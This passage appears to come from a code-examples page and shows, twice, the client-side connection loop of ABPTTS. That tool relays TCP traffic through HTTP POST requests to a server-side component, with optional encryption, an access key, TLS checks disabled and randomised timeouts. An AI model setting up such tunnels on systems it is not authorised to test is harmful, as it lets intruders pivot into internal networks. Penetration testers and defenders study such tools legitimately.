			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', conf.headerNameKey: conf.headerValueKey, 'Connection': 'close'}
		else:
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
		connectionID = ""
		cookieVal = ""
		body = {}
		http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
		response = ""
		content = ""
		cookieVal = ""
		
		try:
			outputHandler.outputMessage('Connecting to %s:%i via %s' % (destAddress, destPort, forwardingURL))
			
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
			
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
				#print "Plaintext message: " + plaintextMessage
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
			else:
#				body = {conf.paramNameOperation: conf.opModeStringOpenConnection, conf.paramNameDestinationHost: destAddress, conf.paramNameDestinationPort: destPort }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			encodedBody = urllib.urlencode(body)
			if conf.echoHTTPBody:
				outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, '', 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionCreated in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Server created connection ID %s' % (connectionID))
			else:
				runChildLoop = 0
				outputHandler.outputMessage('Error: could not create connection. Raw server response: ' + content)
				
			iterationCounter = 0
			clientSentByteCounter = 0
			serverSentByteCounter = 0
			clientHasClosedConnection = False
				
			while runChildLoop == 1:
				clientMessageB64 = ""
				serverMessageB64 = ""
				content = ""
				scaleSocketTimeoutUp = False
				scaleSocketTimeoutDown = False
				clientSocketTimedOut = False
				trafficSent = False
				
				if clientHasClosedConnection == False:
					try:
						currentFromClient = clientsock.recv(conf.clientSocketBufferSize)
						if currentFromClient:
							clientToServerBuffer += currentFromClient
						else:
							clientHasClosedConnection = True					

					except socket.error as e:
						if "timed out" not in str(e):
							raise e
						else:
							clientSocketTimedOut = True

				c2sBufferLength = len(clientToServerBuffer)
				if c2sBufferLength > 0:
					trafficSent = True
					toServerByteCount = conf.clientToServerBlockSize
					if toServerByteCount > c2sBufferLength:
						toServerByteCount = c2sBufferLength
					fromClient = ""
					if toServerByteCount < c2sBufferLength:
						fromClient = clientToServerBuffer[0:toServerByteCount]
						clientToServerBuffer = clientToServerBuffer[toServerByteCount:]
					else:
						fromClient = clientToServerBuffer[:]
						clientToServerBuffer = ""
					clientSentByteCounter = clientSentByteCounter + len(fromClient)
					
					clientMessageB64 = base64.b64encode(fromClient)
					if conf.echoDebugMessages:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%s%i bytes' % (os.linesep, len(fromClient)))
					if conf.echoData:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, clientMessageB64))
				else:
					if clientHasClosedConnection:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Client closed channel')
						clientMessageB64 = ""
						runChildLoop = 0
						closeConnections = 1
							
				try:
					plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
					if len(encryptionKey) > 0:
						#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
						ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
						if conf.echoData:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, ciphertextMessage))
						if conf.accessKeyMode == "header":
							body = {conf.paramNameEncryptedBlock: ciphertextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
					else:
						#body = {conf.paramNameOperation: conf.opModeStringSendReceive, conf.paramNameConnectionID: connectionID, conf.paramNameData: clientMessageB64 }
						plaintextMessage = base64.b64encode(plaintextMessage)
						
						if conf.accessKeyMode == "header":
							body = {conf.paramNamePlaintextBlock: plaintextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }

					encodedBody = urllib.urlencode(body)
					if conf.echoHTTPBody:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
					response = []
					madeRequest = False
					httpRetryCount = 0
					while madeRequest == False:
						try:
							response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
							madeRequest = True
						except Exception as e:
							httpRetryCount += 1
							if httpRetryCount > httpRequestRetryLimit:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request retry limit of %i has been reached, and this request will not be retried. Final error was: %s' % (httpRequestRetryLimit, e))
								madeRequest = True
							else:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request failed with the following message: %s. This request will be retried up to %i times.' % (e, httpRequestRetryLimit))
								time.sleep(httpRequestRetryDelay)
					
					content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
					headers['Cookie'] = cookieVal
				except Exception as e:
					raise e
				
				serverClosedConnection = False
				
				try:
					srb = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					#print '"' + srb + '"'
					srbArray = srb.split(" ", 1)
					fromServer = ""
					if len(srbArray) > 1:
						if srbArray[0] == conf.responseStringData:
							fromServerB64 = srbArray[1]
							fromServer = base64.b64decode(fromServerB64)
							if len(encryptionKey) > 0:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, fromServerB64))
								fromServer = decrypt(fromServer, str(encryptionKey), encryptionBlockSize)
								#print '"' + fromServer + '"'
							else:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, fromServerB64))							
							fullMessageSize = len(fromServer)
							numBlocks = int(math.ceil(float(fullMessageSize) / float(conf.clientBlockSizeLimitFromServer)))
							if conf.echoDebugMessages:
								if numBlocks > 1:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Splitting large block (%i bytes) into %i blocks for relay to client' % (fullMessageSize, numBlocks))
							for blockNum in range(0, numBlocks):
								firstByte = blockNum * conf.clientBlockSizeLimitFromServer
								lastByte = (blockNum + 1) * conf.clientBlockSizeLimitFromServer
								if lastByte > fullMessageSize:
									lastByte = fullMessageSize
								currentBlock = fromServer[firstByte:lastByte]
								serverSentByteCounter = serverSentByteCounter + len(currentBlock)
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, base64.b64encode(currentBlock)))
								if conf.echoDebugMessages:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '(Block %i/%i) %i bytes' % (blockNum + 1, numBlocks, len(currentBlock)))
								try:
									clientsock.send(currentBlock)
								except Exception as e:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error sending to client - %s' % (e))
								if conf.clientBlockTransmitSleepTime > 0.0:
									if blockNum < (numBlocks - 1):
										time.sleep(conf.clientBlockTransmitSleepTime)
					else:
						foundResponseType = False
						if srb == conf.responseStringNoData:
							foundResponseType = True
							if conf.echoDebugMessages:
								outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'No data to receive from server at this time')
						else:
							trafficSent = True
						if srb == conf.responseStringErrorInvalidRequest:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the request was invalid. Verify that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionOpenFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the requested connection could not be opened. You may have requested a destination host/port that is inaccessible to the server, the server may have exhausted ephemeral ports (although this is unlikely), or another component (e.g. firewall) may be interfering with connectivity.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionSendFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while sending data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionReceiveFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while receiving data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorDecryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported a decryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported an encryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptionNotSupported:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that it does not support encryption. Verify that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if foundResponseType == False:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Unexpected response from server: %s' % (content))
							serverClosedConnection = True
					
					if conf.responseStringConnectionClosed in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server explicitly closed connection ID %s' % (connectionID))
						serverClosedConnection = True
					if conf.responseStringErrorConnectionNotFound in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that connection ID %s was not found - assuming connection has been closed.' % (connectionID))
						serverClosedConnection = True				
				except socket.error as e:
					if "timed out" not in str(e):
						raise e
						
				if trafficSent:
					scaleSocketTimeoutDown = True
					scaleSocketTimeoutUp = False
				else:
					scaleSocketTimeoutDown = False
					scaleSocketTimeoutUp = True
					
				if serverClosedConnection == True:
					runChildLoop = 0
					closeConnections = 1
					try:
						responseArray = content.split(" ")
						if len(responseArray) > 1:
							connectionID = responseArray[1]
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s' % (connectionID))
						else:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without specifying its ID' % (connectionID))
					except:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without sending a response' % (connectionID))
						
				iterationCounter = iterationCounter + 1
				if iterationCounter > conf.statsUpdateIterations:
					outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (clientSentByteCounter))
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (serverSentByteCounter))
					iterationCounter = 0
					clientSentByteCounter = 0
					serverSentByteCounter = 0
					
				if runServer == 0:
					outputHandler.outputMessage('Server shutdown request received in thread for connection ID %s' % (connectionID))
					runChildLoop = 0
					closeConnections = 1
				else:
					if conf.autoscaleClientSocketTimeout:
						# scale socket timeout up/down if the criteria for doing so was met
						timeoutChange = 0.0
						#global socketTimeoutCurrent
						newSocketTimeout = socketTimeoutCurrent
						if scaleSocketTimeoutDown or scaleSocketTimeoutUp:
							timeoutChange = conf.clientSocketTimeoutScalingMultiplier * socketTimeoutCurrent
						if scaleSocketTimeoutDown:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if scaleSocketTimeoutUp:
							newSocketTimeout = socketTimeoutCurrent + timeoutChange
						# make sure socket timeout is within specified range
						if newSocketTimeout < conf.clientSocketTimeoutMin:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if newSocketTimeout > conf.clientSocketTimeoutMax:
							newSocketTimeout = conf.clientSocketTimeoutMax
						if newSocketTimeout != socketTimeoutCurrent:
							if conf.echoDebugMessages:
								outputHandler.outputMessage('[Connection ID %s]: Client-side socket timeout has been changed from %f to %f' % (connectionID, socketTimeoutCurrent, newSocketTimeout))
							socketTimeoutCurrent = newSocketTimeout
							
						# apply random socket timeout variation
						timeoutVar = random.uniform(clientSocketTimeoutVariationNeg, conf.clientSocketTimeoutVariation)
						timeoutModifier = (socketTimeoutCurrent * timeoutVar)
						effectiveTimeout = (socketTimeoutCurrent + timeoutModifier)
						if conf.echoDebugMessages:
							outputHandler.outputMessage('[Connection ID %s]: Applying random variation of %f to client-side socket timeout for this iteration - timeout will be %f' % (connectionID, timeoutModifier, effectiveTimeout))
							
						clientsock.settimeout(effectiveTimeout)
					

		except Exception as e:
			outputHandler.outputMessage('Connection-level exception: %s in thread for tunnel (%s -> %s -> %s)' % (e, formattedClientAddress, listeningAddress, formattedServerAddress))
			closeConnections = 1
			runChildLoop = 0
		if closeConnections == 1:
			outputHandler.outputMessage('Disengaging tunnel (%s -> %s -> %s)' % (formattedClientAddress, listeningAddress, formattedServerAddress))
			outputHandler.outputMessage('Closing client socket (%s -> %s)' % (formattedClientAddress, listeningAddress))
			try:
				clientsock.shutdown(1)
				clientsock.close()
			except Exception as e2:
				outputHandler.outputMessage('Exception while closing client socket (%s -> %s): %s' % (formattedClientAddress, listeningAddress, e2))
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }

			else:
				#body = {conf.paramNameOperation: conf.opModeStringCloseConnection, conf.paramNameConnectionID: connectionID }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=urllib.urlencode(body))
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionClosed in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputHandler.outputMessage('Server closed connection ID %s' % (connectionID))
			else:
				outputHandler.outputMessage('Error: could not close connection ID %s (may have already been closed on the server). Raw server response: %s' % (connectionID, content))
		else:
			outputHandler.outputMessage("Unexpected state: child loop exited without closeConnections being set to 1")

	except Exception as bigE:
		outputHandler.outputMessage("High-level exception: %s" % (str(bigE)))

Example 20

Project: ABPTTS
Source File: abpttsclient.py
View license
def child(clientsock, clientAddr, listeningAddress, forwardingURL, destAddress, destPort):
	global clientToServerBuffer
	global socketTimeoutCurrent
	try:
		formattedServerAddress = '%s:%s' % (destAddress, destPort)
		formattedClientAddress = '%s:%s' % (clientAddr[0], clientAddr[1])
		socketTimeoutCurrent = conf.clientSocketTimeoutBase
		clientsock.settimeout(socketTimeoutCurrent)
		closeConnections = 0
		runChildLoop = 1
		if conf.accessKeyMode == "header":
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', conf.headerNameKey: conf.headerValueKey, 'Connection': 'close'}
		else:
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
		connectionID = ""
		cookieVal = ""
		body = {}
		http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
		response = ""
		content = ""
		cookieVal = ""
		
		try:
			outputHandler.outputMessage('Connecting to %s:%i via %s' % (destAddress, destPort, forwardingURL))
			
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
			
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
				#print "Plaintext message: " + plaintextMessage
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
			else:
#				body = {conf.paramNameOperation: conf.opModeStringOpenConnection, conf.paramNameDestinationHost: destAddress, conf.paramNameDestinationPort: destPort }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			encodedBody = urllib.urlencode(body)
			if conf.echoHTTPBody:
				outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, '', 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionCreated in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Server created connection ID %s' % (connectionID))
			else:
				runChildLoop = 0
				outputHandler.outputMessage('Error: could not create connection. Raw server response: ' + content)
				
			iterationCounter = 0
			clientSentByteCounter = 0
			serverSentByteCounter = 0
			clientHasClosedConnection = False
				
			while runChildLoop == 1:
				clientMessageB64 = ""
				serverMessageB64 = ""
				content = ""
				scaleSocketTimeoutUp = False
				scaleSocketTimeoutDown = False
				clientSocketTimedOut = False
				trafficSent = False
				
				if clientHasClosedConnection == False:
					try:
						currentFromClient = clientsock.recv(conf.clientSocketBufferSize)
						if currentFromClient:
							clientToServerBuffer += currentFromClient
						else:
							clientHasClosedConnection = True					

					except socket.error as e:
						if "timed out" not in str(e):
							raise e
						else:
							clientSocketTimedOut = True

				c2sBufferLength = len(clientToServerBuffer)
				if c2sBufferLength > 0:
					trafficSent = True
					toServerByteCount = conf.clientToServerBlockSize
					if toServerByteCount > c2sBufferLength:
						toServerByteCount = c2sBufferLength
					fromClient = ""
					if toServerByteCount < c2sBufferLength:
						fromClient = clientToServerBuffer[0:toServerByteCount]
						clientToServerBuffer = clientToServerBuffer[toServerByteCount:]
					else:
						fromClient = clientToServerBuffer[:]
						clientToServerBuffer = ""
					clientSentByteCounter = clientSentByteCounter + len(fromClient)
					
					clientMessageB64 = base64.b64encode(fromClient)
					if conf.echoDebugMessages:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%s%i bytes' % (os.linesep, len(fromClient)))
					if conf.echoData:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, clientMessageB64))
				else:
					if clientHasClosedConnection:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Client closed channel')
						clientMessageB64 = ""
						runChildLoop = 0
						closeConnections = 1
							
				try:
					plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
					if len(encryptionKey) > 0:
						#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
						ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
						if conf.echoData:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, ciphertextMessage))
						if conf.accessKeyMode == "header":
							body = {conf.paramNameEncryptedBlock: ciphertextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
					else:
						#body = {conf.paramNameOperation: conf.opModeStringSendReceive, conf.paramNameConnectionID: connectionID, conf.paramNameData: clientMessageB64 }
						plaintextMessage = base64.b64encode(plaintextMessage)
						
						if conf.accessKeyMode == "header":
							body = {conf.paramNamePlaintextBlock: plaintextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }

					encodedBody = urllib.urlencode(body)
					if conf.echoHTTPBody:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
					response = []
					madeRequest = False
					httpRetryCount = 0
					while madeRequest == False:
						try:
							response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
							madeRequest = True
						except Exception as e:
							httpRetryCount += 1
							if httpRetryCount > httpRequestRetryLimit:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request retry limit of %i has been reached, and this request will not be retried. Final error was: %s' % (httpRequestRetryLimit, e))
								madeRequest = True
							else:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request failed with the following message: %s. This request will be retried up to %i times.' % (e, httpRequestRetryLimit))
								time.sleep(httpRequestRetryDelay)
					
					content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
					headers['Cookie'] = cookieVal
				except Exception as e:
					raise e
				
				serverClosedConnection = False
				
				try:
					srb = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					#print '"' + srb + '"'
					srbArray = srb.split(" ", 1)
					fromServer = ""
					if len(srbArray) > 1:
						if srbArray[0] == conf.responseStringData:
							fromServerB64 = srbArray[1]
							fromServer = base64.b64decode(fromServerB64)
							if len(encryptionKey) > 0:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, fromServerB64))
								fromServer = decrypt(fromServer, str(encryptionKey), encryptionBlockSize)
								#print '"' + fromServer + '"'
							else:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, fromServerB64))							
							fullMessageSize = len(fromServer)
							numBlocks = int(math.ceil(float(fullMessageSize) / float(conf.clientBlockSizeLimitFromServer)))
							if conf.echoDebugMessages:
								if numBlocks > 1:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Splitting large block (%i bytes) into %i blocks for relay to client' % (fullMessageSize, numBlocks))
							for blockNum in range(0, numBlocks):
								firstByte = blockNum * conf.clientBlockSizeLimitFromServer
								lastByte = (blockNum + 1) * conf.clientBlockSizeLimitFromServer
								if lastByte > fullMessageSize:
									lastByte = fullMessageSize
								currentBlock = fromServer[firstByte:lastByte]
								serverSentByteCounter = serverSentByteCounter + len(currentBlock)
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, base64.b64encode(currentBlock)))
								if conf.echoDebugMessages:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '(Block %i/%i) %i bytes' % (blockNum + 1, numBlocks, len(currentBlock)))
								try:
									clientsock.send(currentBlock)
								except Exception as e:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error sending to client - %s' % (e))
								if conf.clientBlockTransmitSleepTime > 0.0:
									if blockNum < (numBlocks - 1):
										time.sleep(conf.clientBlockTransmitSleepTime)
					else:
						foundResponseType = False
						if srb == conf.responseStringNoData:
							foundResponseType = True
							if conf.echoDebugMessages:
								outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'No data to receive from server at this time')
						else:
							trafficSent = True
						if srb == conf.responseStringErrorInvalidRequest:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the request was invalid. Verify that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionOpenFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the requested connection could not be opened. You may have requested a destination host/port that is inaccessible to the server, the server may have exhausted ephemeral ports (although this is unlikely), or another component (e.g. firewall) may be interfering with connectivity.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionSendFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while sending data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionReceiveFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while receiving data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorDecryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported a decryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptFailed:
